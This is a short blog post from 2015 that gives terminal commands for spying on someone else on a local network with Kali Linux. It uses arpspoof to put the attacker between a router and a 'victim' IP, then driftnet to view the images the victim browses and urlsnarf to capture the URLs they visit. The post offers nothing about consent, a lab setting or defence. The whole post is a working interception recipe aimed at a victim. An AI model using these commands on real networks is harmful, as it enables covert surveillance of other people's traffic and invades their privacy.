Tuesday, March 31, 2015

sniff network activities using kali

open terminal
type  arpspoof -i eth0 -t (router ip) (victim ip)

then open another terminal
type driftnet -i eth0

then new window open.from it u can see images which the victim surf


then type
urlsnarf -i eth0
then all the packets transmit will appears


more info - https://www.youtube.com/watch?v=Oz2Rc0nCENE

No comments:

Post a Comment